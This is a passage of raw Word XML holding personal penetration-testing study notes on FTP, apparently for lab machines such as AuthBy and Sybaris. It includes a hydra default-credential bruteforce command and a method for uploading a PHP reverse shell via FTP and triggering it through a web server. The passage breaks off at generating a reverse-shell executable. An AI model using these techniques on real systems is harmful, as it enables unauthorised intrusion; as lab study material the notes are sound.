                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="59436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13DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="331"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:hyperlink r:id="rId374">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Sybaris</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3DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="331"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This was the first time I've seen someone just fully bruteforce FTP with default credentials. And it found some</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013DC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="331"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is the wordlist: </w:t>
      </w:r>
      <w:hyperlink r:id="rId375">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/govolution/betterdefaultpasslist/blob/master/ftp.txt</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3DD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="331"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hydra -C ftp.txt 192.168.115.93 ftp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013DE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2819400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="330" name="image323.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image323.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId37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3DF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="748"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Also seen in </w:t>
      </w:r>
      <w:hyperlink r:id="rId377">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">AuthBy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3E0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="748"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is the wordlist: </w:t>
      </w:r>
      <w:hyperlink r:id="rId378">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/govolution/betterdefaultpasslist/blob/master/ftp.txt</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013E1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="748"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hydra -C ftp.txt 192.168.115.93 ftp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013E2">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013E3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_tzquv4559udo" w:id="168"/>
      <w:bookmarkEnd w:id="168"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Passive Mode</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013E4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013E5">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to get into passive mode:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="318"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ftp -p 10.10.10.10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013E7">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013E8">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Why use -p?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Because active mode often fails when:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The client is behind a NAT or firewall</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The firewall blocks incoming connections from the server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013EC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You're on TryHackMe, HackTheBox, or another pentesting platform where outgoing-only traffic is allowed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013ED">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013EE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013EF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you are in passive mode and want to get out (or vice versa), you can toggle using this command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="490"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">passive</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="490"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This worked on XXXXXXXXX exam since I couldn't read files before</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="490"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This has to be the FIRST command you run in FTP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013F3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="490"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">passive off</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="490"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Try this too</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013F5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="490"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Opposite is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">passive on</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">passive auto</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013F6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013F7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Passive vs. Active Mode:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="918"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">active mode</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, the server connects back to the client, which can reveal information about the client's setup or be abused if the client has insecure services open.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="918"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">passive mode</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, the client always initiates connections, which limits your ability to exploit or observe the client from the server side.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013FA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013FB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_e5x9mkcc9dq" w:id="169"/>
      <w:bookmarkEnd w:id="169"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Uploading reverse shell to FTP, and then accessing it through a website</w:t>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId379">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">AuthBy</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice, we saw a web server which had the same files as the FTP server. So, once we got admin credentials for FTP, we put in a reverse shell file, and then accessed it through the web server to trigger reverse shell. A similar attack vector can be seen in the /var/ftp section below.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013FE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1462"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First get a reverse shell into a file called</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> php-cmd.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013FF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1462"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">put php-cmd.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001400">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1462"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Access that file in the web server to trigger reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001401">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001402">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001403">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If the above doesn't work, you can try an alternative method for uploading and triggering a reverse shell. This involves uploading a .exe reverse shell and then activating it by running a .php file. It is shown in this write up. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This one is specific for windows though, because it's a .exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001404">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001405">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1: Generate reverse shell executable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001406">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001407">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">64-bit: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
